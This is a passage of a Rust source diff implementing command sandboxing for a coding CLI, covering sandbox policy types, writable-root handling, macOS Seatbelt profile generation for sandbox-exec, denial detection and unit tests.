// For now, we just mark that Landlock would be used
|
||||
|
||||
ExecEnv {
|
||||
command,
|
||||
cwd: spec.cwd.clone(),
|
||||
env,
|
||||
timeout: spec.timeout,
|
||||
sandbox_type: SandboxType::LinuxLandlock,
|
||||
policy: spec.sandbox_policy.clone(),
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a command failure was due to sandbox denial.
|
||||
///
|
||||
/// This helps distinguish between legitimate command failures and
|
||||
/// sandbox-blocked operations.
|
||||
pub fn was_denied(sandbox_type: SandboxType, exit_code: i32, stderr: &str) -> bool {
|
||||
#[cfg(not(any(target_os = "macos", target_os = "linux")))]
|
||||
let _ = (exit_code, stderr);
|
||||
|
||||
match sandbox_type {
|
||||
SandboxType::None => false,
|
||||
|
||||
#[cfg(target_os = "macos")]
|
||||
SandboxType::MacosSeatbelt => seatbelt::detect_denial(exit_code, stderr),
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
SandboxType::LinuxLandlock => landlock::detect_denial(exit_code, stderr),
|
||||
}
|
||||
}
|
||||
|
||||
/// Get a human-readable description of why a command was blocked.
|
||||
pub fn denial_message(sandbox_type: SandboxType, stderr: &str) -> String {
|
||||
#[cfg(not(any(target_os = "macos", target_os = "linux")))]
|
||||
let _ = stderr;
|
||||
|
||||
match sandbox_type {
|
||||
SandboxType::None => "Command failed (no sandbox)".to_string(),
|
||||
|
||||
#[cfg(target_os = "macos")]
|
||||
SandboxType::MacosSeatbelt => {
|
||||
if stderr.contains("file-write") {
|
||||
"Sandbox blocked write access. The command tried to write to a protected location.".to_string()
|
||||
} else if stderr.contains("network") {
|
||||
"Sandbox blocked network access. Enable network_access in sandbox policy if needed.".to_string()
|
||||
} else {
|
||||
format!(
|
||||
"Sandbox blocked operation: {}",
|
||||
stderr.lines().next().unwrap_or("unknown")
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(target_os = "linux")]
|
||||
SandboxType::LinuxLandlock => {
|
||||
if stderr.contains("Permission denied") {
|
||||
"Landlock blocked access. The command tried to access a restricted path."
|
||||
.to_string()
|
||||
} else {
|
||||
format!(
|
||||
"Landlock blocked operation: {}",
|
||||
stderr.lines().next().unwrap_or("unknown")
|
||||
)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
fn expected_shell_command(command: &str) -> Vec<String> {
|
||||
#[cfg(windows)]
|
||||
{
|
||||
vec!["cmd".to_string(), "/C".to_string(), command.to_string()]
|
||||
}
|
||||
#[cfg(not(windows))]
|
||||
{
|
||||
vec!["sh".to_string(), "-c".to_string(), command.to_string()]
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_spec_shell() {
|
||||
let spec = CommandSpec::shell("echo hello", PathBuf::from("/tmp"), Duration::from_secs(30));
|
||||
|
||||
#[cfg(windows)]
|
||||
{
|
||||
assert_eq!(spec.program, "cmd");
|
||||
assert_eq!(spec.args, vec!["/C", "echo hello"]);
|
||||
}
|
||||
#[cfg(not(windows))]
|
||||
{
|
||||
assert_eq!(spec.program, "sh");
|
||||
assert_eq!(spec.args, vec!["-c", "echo hello"]);
|
||||
}
|
||||
assert_eq!(spec.display_command(), "echo hello");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_spec_program() {
|
||||
let spec = CommandSpec::program(
|
||||
"cargo",
|
||||
vec!["build".to_string(), "--release".to_string()],
|
||||
PathBuf::from("/project"),
|
||||
Duration::from_secs(300),
|
||||
);
|
||||
|
||||
assert_eq!(spec.program, "cargo");
|
||||
assert_eq!(spec.display_command(), "cargo build --release");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_command_spec_builder() {
|
||||
let spec = CommandSpec::shell("test", PathBuf::from("."), Duration::from_secs(10))
|
||||
.with_policy(SandboxPolicy::ReadOnly)
|
||||
.with_env_var("FOO", "bar")
|
||||
.with_justification("Testing");
|
||||
|
||||
assert!(matches!(spec.sandbox_policy, SandboxPolicy::ReadOnly));
|
||||
assert_eq!(spec.env.get("FOO"), Some(&"bar".to_string()));
|
||||
assert_eq!(spec.justification, Some("Testing".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sandbox_manager_new() {
|
||||
let manager = SandboxManager::new();
|
||||
assert!(manager.sandbox_available.is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sandbox_manager_select_sandbox() {
|
||||
let manager = SandboxManager::new();
|
||||
|
||||
// DangerFullAccess should never sandbox
|
||||
let no_sandbox = manager.select_sandbox(&SandboxPolicy::DangerFullAccess);
|
||||
assert_eq!(no_sandbox, SandboxType::None);
|
||||
|
||||
// ExternalSandbox should never sandbox
|
||||
let external = manager.select_sandbox(&SandboxPolicy::ExternalSandbox {
|
||||
network_access: true,
|
||||
});
|
||||
assert_eq!(external, SandboxType::None);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_prepare_unsandboxed() {
|
||||
let manager = SandboxManager::new();
|
||||
let spec = CommandSpec::shell("echo test", PathBuf::from("/tmp"), Duration::from_secs(30))
|
||||
.with_policy(SandboxPolicy::DangerFullAccess);
|
||||
|
||||
let env = manager.prepare(&spec);
|
||||
|
||||
assert_eq!(env.sandbox_type, SandboxType::None);
|
||||
assert_eq!(env.command, expected_shell_command("echo test"));
|
||||
assert!(!env.is_sandboxed());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_exec_env_helpers() {
|
||||
let env = ExecEnv {
|
||||
command: vec![
|
||||
"sandbox-exec".to_string(),
|
||||
"-p".to_string(),
|
||||
"policy".to_string(),
|
||||
"--".to_string(),
|
||||
"echo".to_string(),
|
||||
"hello".to_string(),
|
||||
],
|
||||
cwd: PathBuf::from("/tmp"),
|
||||
env: HashMap::new(),
|
||||
timeout: Duration::from_secs(30),
|
||||
sandbox_type: SandboxType::None,
|
||||
policy: SandboxPolicy::default(),
|
||||
};
|
||||
|
||||
assert_eq!(env.program(), "sandbox-exec");
|
||||
assert_eq!(env.args().len(), 5);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_sandbox_type_display() {
|
||||
assert_eq!(format!("{}", SandboxType::None), "none");
|
||||
|
||||
#[cfg(target_os = "macos")]
|
||||
assert_eq!(format!("{}", SandboxType::MacosSeatbelt), "macos-seatbelt");
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,320 @@
|
||||
//! Sandbox policy definitions for command execution restrictions.
|
||||
//!
|
||||
//! This module defines the policies that control what resources a sandboxed
|
||||
//! process can access. Policies range from full unrestricted access to
|
||||
//! tightly controlled workspace-only write access.
|
||||
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
/// Determines execution restrictions for shell commands.
|
||||
///
|
||||
/// The sandbox policy controls filesystem access, network access, and other
|
||||
/// system resources for executed commands. Choose the most restrictive policy
|
||||
/// that still allows your command to function.
|
||||
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
|
||||
#[serde(tag = "type", rename_all = "kebab-case")]
|
||||
pub enum SandboxPolicy {
|
||||
/// No restrictions whatsoever. Use with extreme caution.
|
||||
///
|
||||
/// This policy disables all sandboxing and allows full system access.
|
||||
/// Only use this when absolutely necessary and the command source is trusted.
|
||||
#[serde(rename = "danger-full-access")]
|
||||
DangerFullAccess,
|
||||
|
||||
/// Read-only access to the entire filesystem.
|
||||
///
|
||||
/// The process can read any file but cannot write anywhere.
|
||||
/// Useful for analysis tools that need broad read access.
|
||||
#[serde(rename = "read-only")]
|
||||
ReadOnly,
|
||||
|
||||
/// Indicates the process is already running in an external sandbox.
|
||||
///
|
||||
/// Use this when deepseek-cli is itself running inside a container,
|
||||
/// VM, or other sandboxed environment. This avoids double-sandboxing
|
||||
/// which can cause issues.
|
||||
#[serde(rename = "external-sandbox")]
|
||||
ExternalSandbox {
|
||||
/// Whether network access is allowed in the external sandbox.
|
||||
#[serde(default)]
|
||||
network_access: bool,
|
||||
},
|
||||
|
||||
/// Read-only filesystem access plus write access to specified directories.
|
||||
///
|
||||
/// This is the default and recommended policy. It allows:
|
||||
/// - Read access to the entire filesystem (for tools, libraries, etc.)
|
||||
/// - Write access only to the current working directory and specified roots
|
||||
/// - Optional network access
|
||||
#[serde(rename = "workspace-write")]
|
||||
WorkspaceWrite {
|
||||
/// Additional directories where writes are allowed.
|
||||
#[serde(default, skip_serializing_if = "Vec::is_empty")]
|
||||
writable_roots: Vec<PathBuf>,
|
||||
|
||||
/// Whether outbound network connections are permitted.
|
||||
#[serde(default)]
|
||||
network_access: bool,
|
||||
|
||||
/// Exclude TMPDIR from writable paths.
|
||||
#[serde(default)]
|
||||
exclude_tmpdir: bool,
|
||||
|
||||
/// Exclude /tmp from writable paths.
|
||||
#[serde(default)]
|
||||
exclude_slash_tmp: bool,
|
||||
},
|
||||
}
|
||||
|
||||
impl Default for SandboxPolicy {
|
||||
/// Returns the default policy: workspace-write with no extra roots and no network.
|
||||
fn default() -> Self {
|
||||
SandboxPolicy::WorkspaceWrite {
|
||||
writable_roots: vec![],
|
||||
network_access: false,
|
||||
exclude_tmpdir: false,
|
||||
exclude_slash_tmp: false,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
impl SandboxPolicy {
|
||||
/// Create a workspace-write policy with network access enabled.
|
||||
pub fn workspace_with_network() -> Self {
|
||||
SandboxPolicy::WorkspaceWrite {
|
||||
writable_roots: vec![],
|
||||
network_access: true,
|
||||
exclude_tmpdir: false,
|
||||
exclude_slash_tmp: false,
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a workspace-write policy with additional writable directories.
|
||||
pub fn workspace_with_roots(roots: Vec<PathBuf>, network: bool) -> Self {
|
||||
SandboxPolicy::WorkspaceWrite {
|
||||
writable_roots: roots,
|
||||
network_access: network,
|
||||
exclude_tmpdir: false,
|
||||
exclude_slash_tmp: false,
|
||||
}
|
||||
}
|
||||
|
||||
/// Returns true if the policy allows reading any file on the filesystem.
|
||||
pub fn has_full_disk_read_access() -> bool {
|
||||
// All current policies allow full disk read access
|
||||
true
|
||||
}
|
||||
|
||||
/// Returns true if the policy allows writing to any file on the filesystem.
|
||||
pub fn has_full_disk_write_access(&self) -> bool {
|
||||
matches!(
|
||||
self,
|
||||
SandboxPolicy::DangerFullAccess | SandboxPolicy::ExternalSandbox { .. }
|
||||
)
|
||||
}
|
||||
|
||||
/// Returns true if the policy allows outbound network connections.
|
||||
pub fn has_network_access(&self) -> bool {
|
||||
match self {
|
||||
SandboxPolicy::DangerFullAccess => true,
|
||||
SandboxPolicy::ReadOnly => false,
|
||||
SandboxPolicy::ExternalSandbox { network_access }
|
||||
| SandboxPolicy::WorkspaceWrite { network_access, .. } => *network_access,
|
||||
}
|
||||
}
|
||||
|
||||
/// Returns true if the sandbox should be applied (not bypassed).
|
||||
pub fn should_sandbox(&self) -> bool {
|
||||
!matches!(
|
||||
self,
|
||||
SandboxPolicy::DangerFullAccess | SandboxPolicy::ExternalSandbox { .. }
|
||||
)
|
||||
}
|
||||
|
||||
/// Get the list of writable roots for this policy.
|
||||
///
|
||||
/// This includes:
|
||||
/// - The current working directory
|
||||
/// - Any explicitly specified `writable_roots`
|
||||
/// - /tmp (unless excluded)
|
||||
/// - TMPDIR (unless excluded)
|
||||
///
|
||||
/// For policies with full write access, returns an empty vec since
|
||||
/// there's no need to enumerate specific paths.
|
||||
pub fn get_writable_roots(&self, cwd: &Path) -> Vec<WritableRoot> {
|
||||
match self {
|
||||
// Full write access or read-only - no enumeration needed
|
||||
SandboxPolicy::DangerFullAccess
|
||||
| SandboxPolicy::ExternalSandbox { .. }
|
||||
| SandboxPolicy::ReadOnly => vec![],
|
||||
|
||||
// Workspace write - enumerate all writable paths
|
||||
SandboxPolicy::WorkspaceWrite {
|
||||
writable_roots,
|
||||
exclude_tmpdir,
|
||||
exclude_slash_tmp,
|
||||
..
|
||||
} => {
|
||||
let mut roots: Vec<PathBuf> = writable_roots.clone();
|
||||
|
||||
// Add the current working directory
|
||||
if let Ok(canonical_cwd) = cwd.canonicalize() {
|
||||
roots.push(canonical_cwd);
|
||||
} else {
|
||||
roots.push(cwd.to_path_buf());
|
||||
}
|
||||
|
||||
// Add /tmp unless excluded
|
||||
if !exclude_slash_tmp && let Ok(tmp) = Path::new("/tmp").canonicalize() {
|
||||
roots.push(tmp);
|
||||
}
|
||||
|
||||
// Add TMPDIR unless excluded
|
||||
if !exclude_tmpdir
|
||||
&& let Ok(tmpdir) = std::env::var("TMPDIR")
|
||||
&& let Ok(canonical) = Path::new(&tmpdir).canonicalize()
|
||||
{
|
||||
roots.push(canonical);
|
||||
}
|
||||
|
||||
// Convert to WritableRoot with read-only subpaths
|
||||
roots
|
||||
.into_iter()
|
||||
.map(|root| {
|
||||
let mut read_only_subpaths = Vec::new();
|
||||
|
||||
// Protect .deepseek directories from modification
|
||||
let deepseek_dir = root.join(".deepseek");
|
||||
if deepseek_dir.is_dir() {
|
||||
read_only_subpaths.push(deepseek_dir);
|
||||
}
|
||||
|
||||
WritableRoot {
|
||||
root,
|
||||
read_only_subpaths,
|
||||
}
|
||||
})
|
||||
.collect()
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// A directory tree where writes are allowed, with optional read-only subpaths.
|
||||
///
|
||||
/// This allows fine-grained control like "allow writes to /project but not /project/.deepseek".
|
||||
#[derive(Debug, Clone, PartialEq, Eq)]
|
||||
pub struct WritableRoot {
|
||||
/// The root directory where writes are allowed.
|
||||
pub root: PathBuf,
|
||||
|
||||
/// Subdirectories within root that should remain read-only.
|
||||
pub read_only_subpaths: Vec<PathBuf>,
|
||||
}
|
||||
|
||||
impl WritableRoot {
|
||||
/// Create a new writable root with no read-only exceptions.
|
||||
pub fn new(root: PathBuf) -> Self {
|
||||
Self {
|
||||
root,
|
||||
read_only_subpaths: vec![],
|
||||
}
|
||||
}
|
||||
|
||||
/// Create a writable root with specific read-only subpaths.
|
||||
pub fn with_exceptions(root: PathBuf, read_only: Vec<PathBuf>) -> Self {
|
||||
Self {
|
||||
root,
|
||||
read_only_subpaths: read_only,
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if a path is writable under this root.
|
||||
///
|
||||
/// Returns true if the path is under the root and not under any read-only subpath.
|
||||
pub fn is_path_writable(&self, path: &Path) -> bool {
|
||||
// Must be under the root
|
||||
if !path.starts_with(&self.root) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Must not be under any read-only subpath
|
||||
for subpath in &self.read_only_subpaths {
|
||||
if path.starts_with(subpath) {
|
||||
return false;
|
||||
}
|
||||
}
|
||||
|
||||
true
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_default_policy() {
|
||||
let policy = SandboxPolicy::default();
|
||||
assert!(matches!(policy, SandboxPolicy::WorkspaceWrite { .. }));
|
||||
assert!(!policy.has_network_access());
|
||||
assert!(policy.should_sandbox());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_full_access_policy() {
|
||||
let policy = SandboxPolicy::DangerFullAccess;
|
||||
assert!(policy.has_full_disk_write_access());
|
||||
assert!(policy.has_network_access());
|
||||
assert!(!policy.should_sandbox());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_read_only_policy() {
|
||||
let policy = SandboxPolicy::ReadOnly;
|
||||
assert!(!policy.has_full_disk_write_access());
|
||||
assert!(!policy.has_network_access());
|
||||
assert!(policy.should_sandbox());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_workspace_with_network() {
|
||||
let policy = SandboxPolicy::workspace_with_network();
|
||||
assert!(policy.has_network_access());
|
||||
assert!(policy.should_sandbox());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_writable_root_basic() {
|
||||
let root = WritableRoot::new(PathBuf::from("/project"));
|
||||
assert!(root.is_path_writable(Path::new("/project/src/main.rs")));
|
||||
assert!(!root.is_path_writable(Path::new("/other/file.txt")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_writable_root_with_exceptions() {
|
||||
let root = WritableRoot::with_exceptions(
|
||||
PathBuf::from("/project"),
|
||||
vec![PathBuf::from("/project/.deepseek")],
|
||||
);
|
||||
assert!(root.is_path_writable(Path::new("/project/src/main.rs")));
|
||||
assert!(!root.is_path_writable(Path::new("/project/.deepseek/config")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_policy_serialization() {
|
||||
let policy = SandboxPolicy::WorkspaceWrite {
|
||||
writable_roots: vec![PathBuf::from("/extra")],
|
||||
network_access: true,
|
||||
exclude_tmpdir: false,
|
||||
exclude_slash_tmp: false,
|
||||
};
|
||||
|
||||
let json = serde_json::to_string(&policy).unwrap();
|
||||
assert!(json.contains("workspace-write"));
|
||||
|
||||
let parsed: SandboxPolicy = serde_json::from_str(&json).unwrap();
|
||||
assert_eq!(policy, parsed);
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,398 @@
|
||||
//! macOS Seatbelt (sandbox-exec) profile generation.
|
||||
//!
|
||||
//! Seatbelt is Apple's mandatory access control framework that uses the
|
||||
//! Scheme-based policy language to define what system resources a process
|
||||
//! can access. This module generates sandbox profiles dynamically based
|
||||
//! on the configured `SandboxPolicy`.
|
||||
//!
|
||||
//! # How it works
|
||||
//!
|
||||
//! 1. We generate a Seatbelt policy string in the SBPL format
|
||||
//! 2. We invoke `/usr/bin/sandbox-exec -p <policy>` to run the command
|
||||
//! 3. The kernel enforces the policy, blocking unauthorized operations
|
||||
//!
|
||||
//! # References
|
||||
//!
|
||||
//! - Apple's sandbox(7) man page
|
||||
//! - <https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf>
|
||||
|
||||
// Note: cfg(target_os = "macos") is already applied at the module level in mod.rs
|
||||
|
||||
use super::policy::SandboxPolicy;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::process::Command;
|
||||
use std::sync::OnceLock;
|
||||
|
||||
/// Path to the sandbox-exec binary on macOS.
|
||||
pub const SANDBOX_EXEC_PATH: &str = "/usr/bin/sandbox-exec";
|
||||
|
||||
/// Base seatbelt policy that provides minimal process functionality.
|
||||
///
|
||||
/// This policy:
|
||||
/// - Denies everything by default
|
||||
/// - Allows process execution and forking
|
||||
/// - Allows signals within the same sandbox
|
||||
/// - Allows reading user preferences (needed by many tools)
|
||||
/// - Allows basic process introspection
|
||||
/// - Allows writing to /dev/null
|
||||
/// - Allows reading sysctl values
|
||||
/// - Allows POSIX semaphores and pseudo-TTY operations
|
||||
const SEATBELT_BASE_POLICY: &str = r#"
|
||||
(version 1)
|
||||
(deny default)
|
||||
|
||||
; Core process operations
|
||||
(allow process-exec)
|
||||
(allow process-fork)
|
||||
(allow signal (target same-sandbox))
|
||||
(allow process-info* (target same-sandbox))
|
||||
|
||||
; User preferences (needed by many CLI tools)
|
||||
(allow user-preference-read)
|
||||
|
||||
; Basic I/O to /dev/null
|
||||
(allow file-write-data
|
||||
(require-all
|
||||
(path "/dev/null")
|
||||
(vnode-type CHARACTER-DEVICE)))
|
||||
|
||||
; System information
|
||||
(allow sysctl-read)
|
||||
|
||||
; IPC primitives
|
||||
(allow ipc-posix-sem)
|
||||
(allow ipc-posix-shm-read*)
|
||||
(allow ipc-posix-shm-write-create)
|
||||
(allow ipc-posix-shm-write-data)
|
||||
(allow ipc-posix-shm-write-unlink)
|
||||
|
||||
; Terminal support (essential for shell commands)
|
||||
(allow pseudo-tty)
|
||||
(allow file-read* file-write* file-ioctl (literal "/dev/ptmx"))
|
||||
(allow file-read* file-write* file-ioctl (regex #"^/dev/ttys[0-9]+$"))
|
||||
|
||||
; macOS-specific device access
|
||||
(allow file-read* (literal "/dev/urandom"))
|
||||
(allow file-read* (literal "/dev/random"))
|
||||
(allow file-ioctl (literal "/dev/dtracehelper"))
|
||||
|
||||
; Mach IPC (needed by many system services)
|
||||
(allow mach-lookup)
|
||||
"#;
|
||||
|
||||
/// Network access policy additions.
|
||||
const SEATBELT_NETWORK_POLICY: &str = r"
|
||||
; Network access
|
||||
(allow network-outbound)
|
||||
(allow network-inbound)
|
||||
(allow system-socket)
|
||||
(allow network-bind)
|
||||
";
|
||||
|
||||
/// Check if sandbox-exec is available and permitted on this system.
|
||||
pub fn is_available() -> bool {
|
||||
static SEATBELT_AVAILABLE: OnceLock<bool> = OnceLock::new();
|
||||
|
||||
*SEATBELT_AVAILABLE.get_or_init(|| {
|
||||
if !Path::new(SANDBOX_EXEC_PATH).exists() {
|
||||
return false;
|
||||
}
|
||||
|
||||
let output = Command::new(SANDBOX_EXEC_PATH)
|
||||
.args(["-p", "(version 1)(allow default)", "--", "/usr/bin/true"])
|
||||
.output();
|
||||
|
||||
match output {
|
||||
Ok(result) => result.status.success(),
|
||||
Err(_) => false,
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
/// Create the command-line arguments for sandbox-exec.
|
||||
///
|
||||
/// Returns a Vec of arguments that should be prepended to the command.
|
||||
/// The format is: `sandbox-exec -p <policy> -D KEY=VALUE ... -- <original command>`
|
||||
pub fn create_seatbelt_args(
|
||||
command: Vec<String>,
|
||||
policy: &SandboxPolicy,
|
||||
sandbox_cwd: &Path,
|
||||
) -> Vec<String> {
|
||||
let full_policy = generate_policy(policy, sandbox_cwd);
|
||||
let params = generate_params(policy, sandbox_cwd);
|
||||
|
||||
let mut args = vec!["-p".to_string(), full_policy];
|
||||
|
||||
// Add parameter definitions for variable substitution
|
||||
for (key, value) in params {
|
||||
args.push(format!("-D{}={}", key, value.to_string_lossy()));
|
||||
}
|
||||
|
||||
// Separator between sandbox-exec args and the actual command
|
||||
args.push("--".to_string());
|
||||
args.extend(command);
|
||||
|
||||
args
|
||||
}
|
||||
|
||||
/// Generate the complete Seatbelt policy string for the given policy.
|
||||
fn generate_policy(policy: &SandboxPolicy, cwd: &Path) -> String {
|
||||
let mut full_policy = SEATBELT_BASE_POLICY.to_string();
|
||||
|
||||
// Add read access policy
|
||||
if SandboxPolicy::has_full_disk_read_access() {
|
||||
full_policy.push_str("\n; Full filesystem read access\n(allow file-read*)");
|
||||
}
|
||||
|
||||
// Add write access policy
|
||||
let file_write_policy = generate_write_policy(policy, cwd);
|
||||
if !file_write_policy.is_empty() {
|
||||
full_policy.push_str("\n\n; Write access policy\n");
|
||||
full_policy.push_str(&file_write_policy);
|
||||
}
|
||||
|
||||
// Add network policy if enabled
|
||||
if policy.has_network_access() {
|
||||
full_policy.push('\n');
|
||||
full_policy.push_str(SEATBELT_NETWORK_POLICY);
|
||||
}
|
||||
|
||||
// Add Darwin user cache directory access (needed by many macOS tools)
|
||||
full_policy.push_str("\n\n; Darwin user cache directory\n");
|
||||
full_policy
|
||||
.push_str(r#"(allow file-read* file-write* (subpath (param "DARWIN_USER_CACHE_DIR")))"#);
|
||||
|
||||
// Add common macOS directories that tools often need
|
||||
full_policy.push_str("\n\n; Common macOS directories\n");
|
||||
full_policy.push_str(r#"(allow file-read* (subpath "/usr/lib"))"#);
|
||||
full_policy.push('\n');
|
||||
full_policy.push_str(r#"(allow file-read* (subpath "/usr/share"))"#);
|
||||
full_policy.push('\n');
|
||||
full_policy.push_str(r#"(allow file-read* (subpath "/System/Library"))"#);
|
||||
full_policy.push('\n');
|
||||
full_policy.push_str(r#"(allow file-read* (subpath "/Library/Preferences"))"#);
|
||||
full_policy.push('\n');
|
||||
full_policy.push_str(r#"(allow file-read* (subpath "/private/var/db"))"#);
|
||||
|
||||
full_policy
|
||||
}
|
||||
|
||||
/// Generate the write access portion of the Seatbelt policy.
|
||||
fn generate_write_policy(policy: &SandboxPolicy, cwd: &Path) -> String {
|
||||
// Full disk write access
|
||||
if policy.has_full_disk_write_access() {
|
||||
return r#"(allow file-write* (regex #"^/"))"#.to_string();
|
||||
}
|
||||
|
||||
// Read-only - no write policy needed
|
||||
if matches!(policy, SandboxPolicy::ReadOnly) {
|
||||
return String::new();
|
||||
}
|
||||
|
||||
// Workspace write - enumerate allowed paths
|
||||
let writable_roots = policy.get_writable_roots(cwd);
|
||||
if writable_roots.is_empty() {
|
||||
return String::new();
|
||||
}
|
||||
|
||||
let mut policies = Vec::new();
|
||||
|
||||
for (index, root) in writable_roots.iter().enumerate() {
|
||||
let root_param = format!("WRITABLE_ROOT_{index}");
|
||||
|
||||
if root.read_only_subpaths.is_empty() {
|
||||
// Simple case: entire subtree is writable
|
||||
policies.push(format!("(subpath (param \"{root_param}\"))"));
|
||||
} else {
|
||||
// Complex case: writable with read-only exceptions
|
||||
// Use require-all to combine subpath with require-not for each exception
|
||||
let mut parts = vec![format!("(subpath (param \"{}\"))", root_param)];
|
||||
|
||||
for (subpath_index, _) in root.read_only_subpaths.iter().enumerate() {
|
||||
let ro_param = format!("WRITABLE_ROOT_{index}_RO_{subpath_index}");
|
||||
parts.push(format!("(require-not (subpath (param \"{ro_param}\")))"));
|
||||
}
|
||||
|
||||
policies.push(format!("(require-all {})", parts.join(" ")));
|
||||
}
|
||||
}
|
||||
|
||||
if policies.is_empty() {
|
||||
return String::new();
|
||||
}
|
||||
|
||||
// Combine all write policies with allow
|
||||
format!("(allow file-write*\n {})", policies.join("\n "))
|
||||
}
|
||||
|
||||
/// Generate parameter definitions for variable substitution in the policy.
|
||||
///
|
||||
/// sandbox-exec allows -DKEY=VALUE to substitute `(param "KEY")` in the policy.
|
||||
fn generate_params(policy: &SandboxPolicy, cwd: &Path) -> Vec<(String, PathBuf)> {
|
||||
let mut params = Vec::new();
|
||||
|
||||
// Add writable root parameters
|
||||
let writable_roots = policy.get_writable_roots(cwd);
|
||||
|
||||
for (index, root) in writable_roots.iter().enumerate() {
|
||||
let canonical = root
|
||||
.root
|
||||
.canonicalize()
|
||||
.unwrap_or_else(|_| root.root.clone());
|
||||
params.push((format!("WRITABLE_ROOT_{index}"), canonical));
|
||||
|
||||
// Add parameters for read-only subpaths
|
||||
for (subpath_index, subpath) in root.read_only_subpaths.iter().enumerate() {
|
||||
let canonical_subpath = subpath.canonicalize().unwrap_or_else(|_| subpath.clone());
|
||||
params.push((
|
||||
format!("WRITABLE_ROOT_{index}_RO_{subpath_index}"),
|
||||
canonical_subpath,
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
// Add Darwin user cache directory
|
||||
if let Some(cache_dir) = get_darwin_user_cache_dir() {
|
||||
params.push(("DARWIN_USER_CACHE_DIR".to_string(), cache_dir));
|
||||
} else {
|
||||
// Fallback to a reasonable default
|
||||
if let Ok(home) = std::env::var("HOME") {
|
||||
params.push((
|
||||
"DARWIN_USER_CACHE_DIR".to_string(),
|
||||
PathBuf::from(format!("{home}/Library/Caches")),
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
params
|
||||
}
|
||||
|
||||
/// Get the Darwin user cache directory using confstr.
|
||||
///
|
||||
/// This returns the per-user cache directory that macOS assigns,
|
||||
/// typically something like /var/folders/xx/xxx.../C/
|
||||
fn get_darwin_user_cache_dir() -> Option<PathBuf> {
|
||||
// Use libc to call confstr for _CS_DARWIN_USER_CACHE_DIR
|
||||
let mut buf = vec![0i8; (libc::PATH_MAX as usize) + 1];
|
||||
|
||||
// Safety: `buf` is a writable buffer sized to PATH_MAX + 1 for confstr.
|
||||
let len =
|
||||
unsafe { libc::confstr(libc::_CS_DARWIN_USER_CACHE_DIR, buf.as_mut_ptr(), buf.len()) };
|
||||
|
||||
if len == 0 {
|
||||
return None;
|
||||
}
|
||||
|
||||
// Convert the C string to a Rust PathBuf
|
||||
// Safety: confstr guarantees a NUL-terminated string in `buf` when len > 0.
|
||||
let cstr = unsafe { std::ffi::CStr::from_ptr(buf.as_ptr()) };
|
||||
let path_str = cstr.to_str().ok()?;
|
||||
let path = PathBuf::from(path_str);
|
||||
|
||||
// Try to canonicalize, but return the raw path if that fails
|
||||
path.canonicalize().ok().or(Some(path))
|
||||
}
|
||||
|
||||
/// Detect sandbox denial from command output.
|
||||
///
|
||||
/// Returns true if the output suggests the sandbox blocked an operation.
|
||||
pub fn detect_denial(exit_code: i32, stderr: &str) -> bool {
|
||||
if exit_code == 0 {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Common sandbox denial messages
|
||||
let denial_patterns = [
|
||||
"Operation not permitted",
|
||||
"sandbox-exec",
|
||||
"deny(",
|
||||
"Sandbox: ",
|
||||
];
|
||||
|
||||
denial_patterns.iter().any(|p| stderr.contains(p))
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_is_available() {
|
||||
// This test just checks the function doesn't panic
|
||||
// On macOS it should return true, on other platforms false
|
||||
let _ = is_available();
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_policy_default() {
|
||||
let policy = SandboxPolicy::default();
|
||||
let cwd = Path::new("/tmp/test");
|
||||
let result = generate_policy(&policy, cwd);
|
||||
|
||||
assert!(result.contains("(version 1)"));
|
||||
assert!(result.contains("(deny default)"));
|
||||
assert!(result.contains("(allow file-read*)"));
|
||||
assert!(result.contains("file-write*"));
|
||||
// Default policy has no network
|
||||
assert!(!result.contains("network-outbound"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_policy_with_network() {
|
||||
let policy = SandboxPolicy::workspace_with_network();
|
||||
let cwd = Path::new("/tmp/test");
|
||||
let result = generate_policy(&policy, cwd);
|
||||
|
||||
assert!(result.contains("network-outbound"));
|
||||
assert!(result.contains("network-inbound"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_generate_policy_read_only() {
|
||||
let policy = SandboxPolicy::ReadOnly;
|
||||
let cwd = Path::new("/tmp/test");
|
||||
